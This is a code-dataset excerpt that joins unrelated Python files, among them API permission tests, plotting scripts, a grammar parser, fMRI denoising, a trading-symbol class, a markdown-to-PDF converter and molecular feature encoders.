admin_org = org_admin_headers['CVE-API-ORG']
res2 = requests.get(
f'{env.AWG_BASE_URL}{ORG_URL}/{admin_org}/user/{user}',
headers=org_admin_headers
)
assert res2.status_code == 200
assert json.loads(res2.content.decode())["authority"]["active_roles"][0] == "ADMIN" # admin role still remains after attempting to change secret
#### POST /org ####
def test_reg_user_cannot_post_new_org(reg_user_headers):
""" regular users cannot create new org """
res = requests.post(
f'{env.AWG_BASE_URL}{ORG_URL}',
headers=reg_user_headers
)
assert res.status_code == 403
response_contains_json(res, 'error', 'SECRETARIAT_ONLY')
| StarcoderdataPython |
5114130 | import matplotlib.pyplot as plt
import numpy as np
import json
with open('../tokamaks.json') as f:
machines = json.load(f)
# by type of machine
plt.figure()
types_labels = ["Tokamaks", "Stellarators", "Inertial", "Others"]
types_machine = ["tokamak", "stellarator", "inertial", "alternate_concept"]
bottom = 0
countries = np.unique([machine["country"] for machine in machines])
for country in countries:
country_data = []
for type_machine in types_machine:
country_data.append(
len(
[machine for machine in machines
if machine["configuration"] == type_machine and
machine["country"] == country]))
plt.bar(
types_labels, country_data,
bottom=bottom, color="tab:blue", edgecolor="white")
bottom += np.array(country_data)
# by country
plt.figure()
countries = np.unique([machine["country"] for machine in machines])
countries_total = [
len([machine for machine in machines if machine["country"] == country])
for country in countries]
countries = [x for _, x in sorted(zip(countries_total, countries))]
countries_total = sorted(countries_total)
tokamaks, stellarators, intertials = [], [], []
left = 0
for type_machine, label in zip(types_machine, types_labels):
type_data = []
for country in countries:
type_data.append(
len([machine for machine in machines
if machine["configuration"] == type_machine and
machine["country"] == country]))
plt.barh(countries, type_data, label=label, left=left)
left += np.array(type_data)
plt.legend()
plt.tight_layout()
plt.show()
| StarcoderdataPython |
3219399 | import re
import math
import random
import json
import sys
from nalgene.node import *
SHIFT_WIDTH = 4
start_space = r'^( )*'
def count_indent(s):
indent = len(re.match(start_space, s).group(0))
return math.floor(indent / SHIFT_WIDTH)
def parse_string(base_dir, string):
lines = string.split('\n')
lines = [line for line in lines if not re.match(r'^\s*#', line)]
parsed = Node('')
indexes = [-1]
level = 0
last_ind = 0
for li in range(len(lines)):
line = lines[li]
ind = count_indent(line)
line = re.sub(start_space, '', line).strip()
if len(line) == 0: continue
if level == 0 and line.startswith('@import'):
filename = line.split(' ')[1]
imported = parse_file(base_dir, filename)
for child in imported:
parsed.add(child)
indexes[level] += 1
continue
if ind == last_ind: # Next item in a list
indexes[level] += 1
elif ind > last_ind: # Child item
level += 1
indexes.append(0)
elif ind < last_ind: # Up to next item in parent list
diff = (last_ind - ind)
for i in range(last_ind - ind):
level -= 1
indexes.pop()
indexes[level] += 1
parsed.add_at(line, indexes)
last_ind = ind
return parsed
def tokenizeLeaf(n):
n.type = 'seq'
for s in n.key.split(' '):
added = n.add(s)
n.key = 'seq'
def parse_file(base_dir, filename):
parsed = parse_string(base_dir, open(base_dir + '/' + filename).read())
return parsed
def parse_dict(obj, obj_key='%'):
tree = Node(obj_key)
if isinstance(obj, dict):
for key in obj.keys():
tree.add(parse_dict(obj[key], key))
return tree
else:
tree.add(obj)
return tree
| StarcoderdataPython |
11377668 | <reponame>jayanthyetukuri/CARLA
import itertools
import numpy as np
from .sampler import Sampler
def initialize_non_saturated_action_set(
scm,
dataset,
sampling_handle,
classifier,
factual_instance,
intervention_set,
num_samples=1,
epsilon=5e-2,
):
# default action_set
action_set = dict(
zip(
intervention_set,
[factual_instance.dict()[node] for node in intervention_set],
)
)
for noise_multiplier in np.arange(0, 10.1, 0.1):
# create an action set from the factual instance, and possibly some noise
action_set = {
k: v + noise_multiplier * np.random.randn() for k, v in action_set.items()
}
# sample values
sampler = Sampler(scm)
samples_df = sampler.sample(
num_samples,
factual_instance,
action_set,
sampling_handle,
)
# return action set if average predictive probability of samples >= eps (non-saturated region of classifier)
predict_proba_list = classifier.predict_proba(samples_df)[:, 1]
if (
np.mean(predict_proba_list) >= epsilon and np.mean(predict_proba_list) - 0.5
): # don't want to start on the other side
return action_set
return action_set
def get_discretized_action_sets(
intervenable_nodes,
min_values,
max_values,
mean_values,
decimals=5,
grid_search_bins=10,
max_intervention_cardinality=100,
):
"""
Get possible action sets by finding valid actions on a grid.
Parameters
----------
intervenable_nodes: dict
Contains nodes that are not immutable {"continous": [continous nodes], "categorical": [categical nodes].
min_values: pd.Series
min_values[node] contains the minimum feature value that node takes.
max_values: pd.Series
max_values[node] contains the maximum feature value that node takes.
mean_values: pd.Series
mean_values[node] contains the average feature value that node takes.
decimals: int
Determines the precision of the values to search over, in the case of continuous variables.
grid_search_bins: int
Determines the number of values to search over.
max_intervention_cardinality: int
Determines the maximum size of an action set.
Returns
-------
dict containing the valid action sets.
"""
# list that collects actions
possible_actions_per_node = []
# create grid for continuous variables
for i, node in enumerate(intervenable_nodes["continuous"]):
min_value = mean_values[node] - 2 * (mean_values[node] - min_values[node])
max_value = mean_values[node] + 2 * (max_values[node] - mean_values[node])
grid = list(
np.around(np.linspace(min_value, max_value, grid_search_bins), decimals)
)
grid.append(None)
grid = list(dict.fromkeys(grid))
possible_actions_per_node.append(grid)
# create grid for categorical variables
for node in intervenable_nodes["categorical"]:
# TODO only binary categories supported right now
grid = list(np.around(np.linspace(0, 1, grid_search_bins), decimals=0))
grid.append(None)
grid = list(dict.fromkeys(grid))
possible_actions_per_node.append(grid)
all_action_tuples = list(itertools.product(*possible_actions_per_node))
all_action_tuples = [
_tuple
for _tuple in all_action_tuples
if len([element for element in _tuple if element is not None])
< max_intervention_cardinality
]
# get all node names
nodes = np.concatenate(
[intervenable_nodes["continuous"], intervenable_nodes["categorical"]]
)
# create from list and tuple a dict: {nodes[0]: tuple[0], nodes[1]: tuple[1], etc.}
all_action_sets = [dict(zip(nodes, _tuple)) for _tuple in all_action_tuples]
valid_action_sets = []
for action_set in all_action_sets:
valid_action_set = {k: v for k, v in action_set.items() if v is not None}
valid_action_sets.append(valid_action_set)
return valid_action_sets
| StarcoderdataPython |
40768 | import pandas as pd
from nilearn.signal import clean
from nilearn.interfaces.fmriprep import load_confounds_strategy, load_confounds
from fmriprep_denoise.data.atlas import create_atlas_masker, get_atlas_dimensions
def generate_timeseries_per_dimension(atlas_name, output, benchmark_strategies,
data_aroma, data):
dimensions = get_atlas_dimensions(atlas_name)
for dimension in dimensions:
print(f"-- {atlas_name}: dimension {dimension} --")
print("raw time series")
atlas_info = {"atlas_name":atlas_name,
"dimension":dimension}
subject_timeseries = _generate_raw_timeseries(output, data, atlas_info)
for strategy_name, parameters in benchmark_strategies.items():
print(f"Denoising: {strategy_name}")
print(parameters)
if "aroma" in strategy_name:
_clean_timeserise_aroma(atlas_name, dimension, strategy_name, parameters, output, data_aroma)
else:
_clean_timeserise_normal(subject_timeseries, atlas_name, dimension, strategy_name, parameters, output, data)
def get_confounds(strategy_name, parameters, img):
if strategy_name == 'baseline':
reduced_confounds, sample_mask = load_confounds(img, **parameters)
else:
reduced_confounds, sample_mask = load_confounds_strategy(img, **parameters)
return reduced_confounds, sample_mask
def _clean_timeserise_normal(subject_timeseries, atlas_name, dimension, strategy_name, parameters, output, data):
atlas_spec = f"atlas-{atlas_name}_nroi-{dimension}"
_, img, ts_path = _get_output_info(strategy_name,
output,
data,
atlas_spec)
reduced_confounds, sample_mask = get_confounds(strategy_name,
parameters,
img)
if _check_exclusion(reduced_confounds, sample_mask):
clean_timeseries = []
else:
clean_timeseries = clean(subject_timeseries,
detrend=True, standardize=True,
sample_mask=sample_mask,
confounds=reduced_confounds)
clean_timeseries = pd.DataFrame(clean_timeseries)
clean_timeseries.to_csv(ts_path, sep='\t', index=False)
def _clean_timeserise_aroma(atlas_name, dimension, strategy_name, parameters, output, data_aroma):
atlas_spec = f"atlas-{atlas_name}_nroi-{dimension}"
subject_mask, img, ts_path = _get_output_info(strategy_name,
output,
data_aroma,
atlas_spec)
reduced_confounds, sample_mask = get_confounds(strategy_name,
parameters,
img)
aroma_masker, _ = create_atlas_masker(atlas_name, dimension,
subject_mask,
nilearn_cache="")
clean_timeseries = aroma_masker.fit_transform(
img, confounds=reduced_confounds, sample_mask=sample_mask)
clean_timeseries = pd.DataFrame(clean_timeseries)
clean_timeseries.to_csv(ts_path, sep='\t', index=False)
def _generate_raw_timeseries(output, data, atlas_info):
subject_spec, subject_output, subject_mask = _get_subject_info(output, data)
rawts_path = subject_output / f"{subject_spec}_atlas-{atlas_info['atlas_name']}_nroi-{atlas_info['dimension']}_desc-raw_timeseries.tsv"
raw_masker, atlas_labels = create_atlas_masker(atlas_info['atlas_name'],
atlas_info['dimension'],
subject_mask,
detrend=False,
nilearn_cache="")
timeseries_labels = pd.DataFrame(columns=atlas_labels)
if not rawts_path.is_file():
subject_timeseries = raw_masker.fit_transform(data.func[0])
df = pd.DataFrame(subject_timeseries, columns=raw_masker.labels_)
# make sure missing label were put pack
df = pd.concat([timeseries_labels, df])
df.to_csv(rawts_path, sep='\t', index=False)
else:
df = pd.read_csv(rawts_path, header=0, sep='\t')
subject_timeseries = df.values
del raw_masker
return subject_timeseries
def _get_output_info(strategy_name, output, data, atlas_spec):
subject_spec, subject_output, subject_mask = _get_subject_info(output, data)
img = data.func[0]
ts_path = subject_output / f"{subject_spec}_{atlas_spec}_desc-{strategy_name}_timeseries.tsv"
return subject_mask,img,ts_path
def _check_exclusion(reduced_confounds, sample_mask):
if sample_mask is not None:
kept_vol = len(sample_mask) / reduced_confounds.shape[0]
remove = 1 - kept_vol
else:
remove = 0
remove = remove > 0.2
return remove
def _get_subject_info(output, data):
img = data.func[0]
subject_spec = data.func[0].split('/')[-1].split('_desc-')[0]
subject_root = img.split(subject_spec)[0]
subject_id = subject_spec.split('_')[0]
subject_output = output / subject_id
subject_output.mkdir(exist_ok=True)
subject_mask = f"{subject_root}/{subject_spec}_desc-brain_mask.nii.gz"
return subject_spec, subject_output, subject_mask
| StarcoderdataPython |
11378787 | from os import close, name
from broker import Broker
from config import AssetType, Config, SpreadMode
from sessional_spread import SessionalSpread
from typing import List, Dict
from datetime import timedelta
import pandas as pd
import numpy as np
import talib as ta
class Symbol:
def __init__(self,
broker: Broker,
symbol: str) -> None:
'''
broker: Broker -> Specifies a broker for the symbol
symbol: str -> Symbol name
'''
assert symbol in broker.symbols, "Invalid symbol"
assert len(list(filter(lambda x: x["name"] == symbol, Config.symbols))) == 1, "Symbol details not set in config file"
self.broker = broker
# getting the symbol specification from the Config class
self.info = list(filter(lambda x: x["name"] == symbol, Config.symbols))[0]
# getting the cash currency pair
self.cash_pair: str = self.get_cash_pair()
# initialize the sessional_spread to None
self.sessional_spread: SessionalSpread = None
'''
The following are example to illustrate adding the features for the symbol
'''
# self.add_ema()
# self.add_band()
# self.add_roc()
# self.add_atr()
def get_cash_pair(self) -> str:
'''
Instructment.get_cash_pair(): This is to get the account currency and quote currency pair, so that which is needed to convert back and forth of the account currency
'''
result: str = None
if self.info["asset_type"] == AssetType.FOREX:
if self.info["quote"] != Config.account["currency"]:
tmp: List[str] = list(filter(lambda x: self.info["quote"] in x and Config.account["currency"] in x, self.broker.symbols))
assert len(tmp) == 1, "None or more than 1 of fx pair is found"
result = tmp[0]
else:
result = self.info["name"]
else:
result = Config.account["currency"]
return result
def get_rate(self) -> Dict:
'''
Instructment.get_rate(): Getting the price rates for the symbol, those rates can be used in trading simulation
'''
tmp = self.broker.get_data(
symbol = self.info["name"],
window_size = 1,
features = ["tf", "open", "high", "low", "close", "vol", "bid", "ask", "spread"])
result: Dict = dict(zip(tmp.index, tmp.tolist()))
result["dt"] = tmp.name
result["dt_close"] = result["dt"] + timedelta(minutes = result["tf"]) - timedelta(milliseconds=1)
result.pop("tf")
return result
def get_pt_value(self, applied_price: str = "close") -> float:
'''
Instructment.get_pt_value(applied_price:str):
The point value of the symbol respectively to the account currency
applied_price:str -> Either of 'open', 'high', 'low', 'close' symbol rate's respective account currency will need to be return
'''
val: float = 1
if self.info["asset_type"] == AssetType.FOREX:
if self.info["quote"] != Config.account["currency"]:
tmp = self.broker.get_data(self.cash_pair, 1, [applied_price])
val = 1/tmp[applied_price]
else:
assert self.info["fixed_pt_value"] > 0, "Invalid fixed point value for the underlying asset."
val = self.info["fixed_pt_value"]
assert val > 0, "Invalid point value for the underlying asset."
return val
def set_spread(self, session_spread: SessionalSpread = None) -> None:
'''
Instructment.set_spread(session_spread: SessionalSpread) ->
Setting the spread of the underlying instructment according the spread method
'''
if self.info["spread_mode"] == SpreadMode.RANDOM:
s = np.random.uniform(
low = self.info["min_spread"]/(10**self.info["digits"]),
high = self.info["max_spread"]/(10**self.info["digits"]),
size = len(self.broker.dt)
)
s = np.round(s, self.info["digits"])
spread : pd.Series = pd.Series(s, name = "spread", index = self.broker.dt)
self.broker.add_features(self.info["name"], spread)
if self.info["spread_mode"] in [SpreadMode.FIXED, SpreadMode.IGNORE]:
s = np.zeros(len(self.broker.dt))
if self.info["spread_mode"] == SpreadMode.FIXED:
s += self.info["fixed_spread"]
spread : pd.Series = pd.Series(s, name = "spread", index = self.broker.dt)
self.broker.add_features(self.info["name"], spread)
if self.info["spread_mode"] == SpreadMode.SESSIONAL:
assert session_spread != None, "Sessional Spread is not provided"
self.sessional_spread = session_spread
if self.info["spread_mode"] == SpreadMode.BIDASK:
tmp: pd.DataFrame = self.broker.get_data(
symbol = self.info["name"],
window_size = 0,
features = ["bid", "ask"]
)
sprad = tmp.ask - tmp.bid
self.broker.add_features(self.info["name"], sprad, "spread")
def get_spread(self) -> float:
'''
Instructment.get_spread(): getting the current spread
'''
if self.info["spread_mode"] == SpreadMode.SESSIONAL:
assert self.sessional_spread != None, "Sessional spread is not set"
return self.sessional_spread.get_spread(self.broker.dt[self.broker.shift])
if self.info["spread_mode"] in [SpreadMode.FIXED, SpreadMode.BIDASK, SpreadMode.RANDOM]:
if self.info["name"] in self.broker.symbols:
tmp = self.broker.get_data(self.info["name"], 1, ["spread"])
return tmp.spread
if self.info["spread_mode"] == SpreadMode.IGNORE:
return 0.0
def add_sto(self) -> None:
'''
Instructment.add_sto(): This is the demo of adding stochastic oscillator to the symbol using the talib
'''
rates: pd.DataFrame = self.broker.get_data(symbol = self.info["name"], window_size = 0, features = ["open", "high", "low", "close"])
slowk, slowd = ta.STOCH(high=rates.high,
low=rates.low,
fastk_period=5,
close=rates.close,
slowk_period=3,
slowk_matype=0,
slowd_period=3,
slowd_matype=0)
self.broker.add_features(symbol = self.info["name"], features = slowk, feature_name = "sto_fast")
self.broker.add_features(symbol = self.info["name"], features = slowd, feature_name = "sto_slow")
def add_ema(self) -> None:
'''
Instructment.add_ema(): demo of adding ema to the symbol using the talib
'''
rates: pd.DataFrame = self.broker.get_data(symbol = self.info["name"], window_size = 0, features = ["open", "high", "low", "close"])
ema = ta.EMA(rates.close, timeperiod=5)
ema_code = rates.close - ema
ema_code = ema_code.apply(lambda x: 1 if x>0 else 0)
self.broker.add_features(symbol = self.info["name"], features = ema_code, feature_name = "ema")
def add_roc(self) -> None:
'''
Instructment.add_roc(): adding the Rate Of Change of the symbol using the talib
'''
rates: pd.DataFrame = self.broker.get_data(symbol = self.info["name"], window_size = 0, features = ["open", "high", "low", "close"])
roc = ta.ROC(rates.close, timeperiod=5)
self.broker.add_features(symbol = self.info["name"], features = roc, feature_name = "roc")
def add_band(self) -> None:
'''
Instructment.add_band(): adding the Bollinger Band to the symbol using the talib
'''
rates: pd.DataFrame = self.broker.get_data(symbol = self.info["name"], window_size = 0, features = ["open", "high", "low", "close"])
upper, middle, lower = ta.BBANDS(rates.close, timeperiod=5, nbdevup=2, nbdevdn=2, matype=0)
self.broker.add_features(symbol = self.info["name"], features = upper, feature_name = "bb_upper")
self.broker.add_features(symbol = self.info["name"], features = middle, feature_name = "bb_middle")
self.broker.add_features(symbol = self.info["name"], features = lower, feature_name = "bb_lower")
def add_atr(self) -> None:
'''
Instructment.add_atr(): adding the Actual True Range indicator to the symbol using talib
'''
rates: pd.DataFrame = self.broker.get_data(symbol = self.info["name"], window_size = 0, features = ["open", "high", "low", "close"])
atr = ta.ATR(high=rates.high,
low=rates.low,
close=rates.close,
timeperiod=5)
self.broker.add_features(symbol = self.info["name"], features = atr, feature_name = "atr")
| StarcoderdataPython |
6595360 | import os
from redlib.api.system import is_linux, is_windows
from .bash_script_installer import BASHScriptInstaller
from .posh_script_installer import PoshScriptInstaller
from .shell_script_installer import ShellScriptInstallError
def get_shell_script_installer():
if is_linux():
shell = os.environ.get('SHELL', None)
if shell is None or shell.find('bash') == -1:
raise ShellScriptInstallError('shell not supported (currently supported: BASH)')
return BASHScriptInstaller()
elif is_windows():
raise ShellScriptInstallError('platform not supported')
else:
raise ShellScriptInstallError('platform not supported')
def platform_supported():
try:
get_shell_script_installer()
except ShellScriptInstallError:
return False
return True
| StarcoderdataPython |
3567937 | <filename>markdown2pdf.py
# -*- coding: utf-8 -*-
import markdown
import ho.pisa as pisa
import StringIO
import os
import re
from Cheetah.Template import Template
from tempfile import NamedTemporaryFile
debug = False
def markdown2pdf(text, pdffile, cssfile='xhtml2pdf.css', src_dir='.',
fontfile='arial.ttf', skipTo1st=False):
global debug
md = markdown.Markdown(extensions=['meta','footnotes'])
html = md.convert(text)
# post-process unofficial markup
# 1) <p>*</p> --> <p class="blankpara"> </p>
# 2) quotation mark
html = html.replace('<p>*</p>', '<p class="blankpara"> </p>')
html = re.sub(u'“ ?', "“", html)
html = html.replace(u'”',"”")
html = re.sub(u"‘ ?", "‘", html)
html = html.replace(u"’","’")
if debug:
open('test.html','w').write(html.encode('utf-8'))
htmline = []
#-- Cover & Title Page
cover_file = None
title = None
author = None
cif = None
if 'cover_url' in md.Meta:
cover_url = md.Meta['cover_url'][0]
if cover_url.startswith('http://'):
import urllib
cif = NamedTemporaryFile(delete=False)
cif.write( urllib.urlopen(cover_url).read() )
cif.close()
cover_file = cif.name
else:
cover_file = cover_url
if cover_url.startswith('file://'):
cover_file = cover_url[7:]
if 'title' in md.Meta:
title = md.Meta['title'][0].replace(', ','<br />')
if 'author' in md.Meta:
author = md.Meta['author'][0].replace(', ','<br />')
cover_tmpl = open(os.path.join('template','pdf','coverpage.html'), 'r').read().decode('utf-8')
coverpg_htm = str( Template(cover_tmpl, searchList=[ {'cover_url':cover_file,'title':title,'author':author} ]) )
htmline.append( unicode(coverpg_htm,'utf-8') )
#-- Body
# correct image path
for url in re.compile('<img [^>]*src="(.*?)"').findall(html):
if url.startswith('http://') or os.path.isabs(url):
pass
else:
html = html.replace(url, os.path.normpath(src_dir+'/'+url))
if skipTo1st:
html = html[ html.find('<h1'): ]
html = html.replace('<h1 />','<h1></h1>')
htmline.append(html)
#-- PDF generation
css_tmpl = open(os.path.join('template','pdf',cssfile), 'r').read().decode('utf-8')
target_css = str( Template(css_tmpl, searchList=[ {'font':'fonts/'+fontfile} ]) )
fp = file(pdffile,'wb')
pdf = pisa.pisaDocument(
StringIO.StringIO('\n'.join(htmline).encode('utf-8')),
fp,
#path=src_dir, # not working!
#link_callback=fetch_resources,
default_css=target_css,
#xhtml=True,
encoding='utf-8')
fp.close()
if cif and os.path.exists(cif.name):
os.remove(cif.name)
#if debug and not pdf.err:
# pisa.startViewer(pdffile)
# suppress ho.pisa loggin message
import logging
class PisaNullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger("ho.pisa").addHandler(PisaNullHandler())
if __name__ == "__main__":
debug = True
import os, sys
outfile = os.path.splitext(sys.argv[1])[0] + ".pdf"
text = unicode(open(sys.argv[1],'r'),'utf-8')[1:]
markdown2pdf(text, outfile, fontfile='SeoulHangang.ttf')
# vim:sw=4:ts=4:et
| StarcoderdataPython |
4904041 | <reponame>karaage0703/zero-deeplearning
import numpy as np
import matplotlib.pylab as plt
def sigmoid(x):
return 1/(1 + np.exp(-x))
x = np.arange(-5.0, 5.0 , 0.1)
y = sigmoid(x)
plt.plot(x, y)
plt.ylim(-0.1, 1.1)
plt.show()
| StarcoderdataPython |
11344672 | <reponame>Steap/SIXEcho<gh_stars>0
# coding=utf-8
from unittest import TestCase
from sixecho import Client
import sixecho
from time import sleep
class TestSixecho(TestCase):
def test_tokenize(self):
word = 'ในการเขียนโปรแกรมในภาษา Python โมดูล (Module) คือไฟล์ของโปรแกรมที่กำหนดตัวแปร ฟังก์ชัน หรือคลาสโดยแบ่งย่อยออกไปจากโปรแกรมหลัก และสามารถนำมาใช้งานได้โดยการนำเข้ามาในโปรแกรม (Import) กล่าวอีกนัยหนึ่ง โมดูลก็คือไลบรารี่ที่สร้างไว้และนำมาใช้งานในโปรแกรม ในบทนี้ เราจะพูดถึงความหมายของโมดูล การสร้าง และการใช้งานโมดูลในการเขียนโปรแกรม นอกจากนี้ เราจะแนะนำให้คุณรู้จักกับ Package ซึ่งเป็นแนวคิดในการจัดการกับโมดูลในรูปแบบของ Namespace'
words = sixecho.tokenize(str=word)
self.assertTrue(words>0)
def test_printProgressBar(self):
items = list(range(0, 57))
l = len(items)
sixecho.printProgressBar(0, l, prefix = 'Progress:', suffix = 'Complete', length = 50, fill = '█')
for i,_ in enumerate(items):
sleep(0.1)
sixecho.printProgressBar(i + 1, l, prefix = 'Progress:', suffix = 'Complete', length = 50,fill = '█')
self.assertTrue(True)
def test_generate(self):
client = Client()
client.generate(str="สวัสดีครับ ผมชื่อ กอล์ฟ")
self.assertTrue(client.digest().size==128)
def test_jaccard_different(self):
client = Client()
client.generate(str="สวัสดีครับ ผมชื่อ กอล์ฟ")
client2 = Client()
client2.generate(str="วันนี้เป็นที่พฤหัสบดี")
self.assertEqual(0.0,client.min_hash.jaccard(client2.min_hash))
def test_jaccard_likely(self):
client = Client()
client.generate(str="สวัสดีครับ ผมชื่อ กอล์ฟ")
client2 = Client()
client2.generate(str="ผมชื่อแบงก์ I am bank. ไปเที่ยวกันไหม")
print(client.min_hash.jaccard(client2.min_hash))
self.assertTrue(client.min_hash.jaccard(client2.min_hash)< 0.5)
| StarcoderdataPython |
5165050 | <filename>tcvaemolgen/structures/mol_features.py
"""Molecule Feature Description
Unless otherwise noted, all work by:
******************************************************************
Title: PA-Graph-Transformer
Author: <NAME> (<EMAIL>)
Date: May 28, 2019
Code version: 4274301
Availability: https://github.com/benatorc/PA-Graph-Transformer.git
******************************************************************
"""
import itertools
import rdkit.Chem as Chem
import torch as torch
from typing import Any, Dict, List, Set
from tcvaemolgen.utils.chem import get_clique_mol, tree_decomp
# The default valid symbols for atom features
SYMBOLS: List[str] = [
'C', 'N', 'O', 'S', 'F', 'Si', 'P', 'Cl', 'Br', 'Mg',
'Na', 'Ca', 'Fe', 'As', 'Al', 'I', 'B', 'V', 'K', 'Tl',
'Yb', 'Sb', 'Sn', 'Ag', 'Pd', 'Co', 'Se', 'Ti', 'Zn',
'H', 'Li', 'Ge', 'Cu', 'Au', 'Ni', 'Cd', 'In', 'Mn',
'Zr', 'Cr', 'Pt', 'Hg', 'Pb', 'W', 'Ru', 'Nb', 'Re',
'Te', 'Rh', 'Tc', 'Ba', 'Bi', 'Hf', 'Mo', 'U', 'Sm',
'Os', 'Ir', 'Ce', 'Gd', 'Ga', 'Cs', '*', 'UNK'
]
# The default valid formal charges for atom features
FORMAL_CHARGES: List[int] = [-2, -1, 0, 1, 2]
CHIRAL_TAG: List[int] = [0, 1, 2, 3]
# The default valid bond types for bond features
BOND_TYPES: List[Chem.rdchem.BondType] = [
Chem.rdchem.BondType.SINGLE,
Chem.rdchem.BondType.DOUBLE,
Chem.rdchem.BondType.TRIPLE,
Chem.rdchem.BondType.AROMATIC,
None, # Zero, no bond
]
BT_MAPPING: Dict[int, Chem.rdchem.BondType] = {
0.: None,
1.: Chem.rdchem.BondType.SINGLE,
2.: Chem.rdchem.BondType.DOUBLE,
3.: Chem.rdchem.BondType.TRIPLE,
1.5: Chem.rdchem.BondType.AROMATIC,
}
BT_MAPPING_INV: Dict[Chem.rdchem.BondType, int] = \
{v: k for k, v in BT_MAPPING.items()}
BT_STEREO: List[int] = [0, 1, 2, 3, 4, 5]
""" Helper Function to convert BondType index to Float (Aromatic)
Returns
-------
[type]
[description]
"""
def bt_index_to_float(bt_index: int):
bond_type = BOND_TYPES[bt_index]
return BT_MAPPING_INV[bond_type]
# Maximum number of neighbors for an atom
MAX_NEIGHBORS: int = 10
DEGREES: List[int] = list(range(MAX_NEIGHBORS))
EXPLICIT_VALENCES: List[int] = [0, 1, 2, 3, 4, 5, 6]
IMPLICIT_VALENCES: List[int] = [0, 1, 2, 3, 4, 5]
"""
N_ATOM_FEATS: int = (len(SYMBOLS) + len(FORMAL_CHARGES) + len(DEGREES) +
len(EXPLICIT_VALENCES) + len(IMPLICIT_VALENCES) +
len(CHIRAL_TAG) + 1)
"""
N_ATOM_FEATS = (len(SYMBOLS) + len(FORMAL_CHARGES) + len(DEGREES) +
len(EXPLICIT_VALENCES) + len(IMPLICIT_VALENCES) + 1)
N_BOND_FEATS: int = len(BOND_TYPES) + 1 + 1
MAX_NEIGHBORS: int = 10
def get_bt_index(bond_type):
"""Returns the feature index for a particular bond type.
Args:
bond_type: Either a rdchem bond type object (can be None) or a float
representing the bond type
"""
if bond_type not in BOND_TYPES:
assert bond_type in BT_MAPPING
bond_type = BT_MAPPING[bond_type]
return BOND_TYPES.index(bond_type)
def onek_unk_encoding(x: Any, domain: Set):
"""Returns a one-hot encoding of the given feature."""
if x not in domain:
x = 'UNK'
return [int(x == s) for s in domain]
def get_atom_features(atom):
"""Given an atom object, returns a numpy array of features."""
# Atom features are symbol, formal charge, degree, explicit/implicit
# valence, and aromaticity
if False:#atom.is_dummy:
symbol = onek_unk_encoding(atom.GetSymbol(), SYMBOLS)
padding = [0] * (N_ATOM_FEATS - len(symbol))
feature_array = symbol + padding
else:
symbol = onek_unk_encoding(atom.GetSymbol(), SYMBOLS)
fc = onek_unk_encoding(atom.GetFormalCharge(), FORMAL_CHARGES)
degree = onek_unk_encoding(atom.GetDegree(), DEGREES)
exp_valence = onek_unk_encoding(atom.GetExplicitValence(), EXPLICIT_VALENCES)
imp_valence = onek_unk_encoding(atom.GetImplicitValence(), IMPLICIT_VALENCES)
aro = [atom.GetIsAromatic()]
feature_array = symbol + fc + degree + exp_valence + imp_valence + aro
return torch.Tensor(feature_array)
def get_bond_features(bond: Chem.rdchem.Bond, bt_only: bool = False):
"""Given an bond object, returns a numpy array of features.
bond can be None, in which case returns default features for a non-bond.
"""
# Bond features are bond type, conjugacy, and ring-membership
if bond is None:
bond_type = onek_unk_encoding(None, BOND_TYPES)
conj = [0]
ring = [0]
else:
bond_type = onek_unk_encoding(bond.GetBondType(), BOND_TYPES)
conj = [int(bond.GetIsConjugated())]
ring = [int(bond.IsInRing())]
if bt_only:
feature_array = bond_type
else:
feature_array = bond_type + conj + ring
return torch.Tensor(feature_array)
def get_bt_feature(bond_type: Chem.rdchem.BondType):
"""Returns a one-hot vector representing the bond_type."""
if bond_type in BT_MAPPING:
bond_type = BT_MAPPING[bond_type]
return onek_unk_encoding(bond_type, BOND_TYPES)
def get_path_bond_feature(bond: Chem.rdchem.Bond):
"""Given a rdkit bond object, returns the bond features for that bond.
When the given input is none, returns a 0-vector"""
if bond is None:
return torch.zeros(N_BOND_FEATS)
else:
bond_type = onek_unk_encoding(bond.GetBondType(), BOND_TYPES)
conj = [int(bond.GetIsConjugated())]
ring = [int(bond.IsInRing())]
return torch.Tensor(bond_type + conj + ring)
def mol2tensors(mol: Chem.Mol, cliques=False):
if mol is None:
return None, None
nodes_dict = {}
root = 0
if cliques:
cliques, edges = tree_decomp(mol)
n_cliques = len(cliques)
nodes = torch.zeros((n_cliques,N_ATOM_FEATS))
for i, clique in enumerate(cliques):
print(f'Clique {i}')
cmol = get_clique_mol(mol, clique)
nodes[i] = torch.Tensor(get_atom_features(cmol))
csmiles = get_smiles(cmol)
nodes_dict[i] = dict(
smiles=csmiles,
#mol=get_mol(csmiles),
clique=[])
if min(clique) == 0:
root = i
if root > 0:
for attr in nodes_dict[0]:
nodes_dict[0][attr], nodes_dict[root][attr] =\
nodes_dict[root][attr], nodes_dict[0][attr]
edge_index = torch.zeros((n_edges * 2,2),
dtype=torch.long)
for i, (_x, _y) in zip(itertools.count(), edges):
x = 0 if _x == root else root if _x == 0 else _x
y = 0 if _y == root else root if _y == 0 else _y
edge_index[2*i] = torch.LongTensor([x, y])
edge_index[2*i+1] = torch.LongTensor([y, x])
nodes_dict[x]['clique'].append(y)
nodes_dict[y]['clique'].append(x)
else:
n_nodes = mol.GetNumAtoms()
n_edges = mol.GetNumBonds()
nodes = torch.zeros((n_nodes,N_ATOM_FEATS),
dtype=torch.float64)
for i, rd_atom in enumerate(mol.GetAtoms()):
nodes[i] = get_atom_features(rd_atom)
edge_index = torch.zeros((n_edges * 2,2),
dtype=torch.long)
edge_attr = torch.zeros((n_edges * 2,N_BOND_FEATS),
dtype=torch.float64)
for i, bond in zip(itertools.count(), mol.GetBonds()):
_x = bond.GetBeginAtom().GetIdx()
_y = bond.GetEndAtom().GetIdx()
x = 0 if _x == root else root if _x == 0 else _x
y = 0 if _y == root else root if _y == 0 else _y
edge_index[2*i] = torch.LongTensor([x, y])
edge_index[2*i+1] = torch.LongTensor([y, x])
edge_attr[2*i] = get_bond_features(bond)
edge_attr[2*i+1] = edge_attr[2*i].clone()
if cliques:
return nodes, edge_index, edge_attr, nodes_dict
else:
return nodes, edge_index, edge_attr
| StarcoderdataPython |
1808909 | from polyphony import testbench
from polyphony import pipelined
def nested06(x):
s = x
for i in pipelined(range(4)):
t = i
for j in range(4):
t += 1
for k in range(4):
s += 2
for l in range(4):
s += 3
s += t
return s
@testbench
def test():
assert 928 == nested06(10)
test()
| StarcoderdataPython |
304478 | <reponame>quanshengwu/PyChemia
"""
Routines to read and write POSCAR file
"""
import os
import numpy as _np
import pychemia
